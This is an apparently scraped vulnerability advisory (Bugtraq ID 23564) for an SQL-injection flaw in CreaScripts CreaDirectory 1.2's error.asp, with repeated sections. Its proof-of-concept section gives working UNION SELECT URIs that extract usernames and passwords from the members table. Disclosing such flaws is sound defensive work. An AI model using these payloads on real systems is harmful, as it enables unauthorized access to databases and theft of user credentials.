Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
BID:23564
Info
Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
| Bugtraq ID: | 23564 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2007 12:00AM |
| Updated: | Apr 19 2007 10:51PM |
| Credit: | CyberGhost is credited with the discovery of this vulnerability. |
| Vulnerable: |
CreaScripts creadirectory 1.2 |
| Not Vulnerable: | |
Discussion
Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
Creascripts CreaDirectory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Creascripts CreaDirectory 1.2 is vulnerable; other versions may also be affected.
Creascripts CreaDirectory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Creascripts CreaDirectory 1.2 is vulnerable; other versions may also be affected.
Exploit / POC
Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
Username : http://www.example.com/error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Password:
http://www.example.com/error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Attackers can use a browser to exploit this issue.
The following example URIs are available:
Username : http://www.example.com/error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Password:
http://www.example.com/error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Solution / Fix
Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
References:
References:
- Creadirectory Web Site (Creascripts)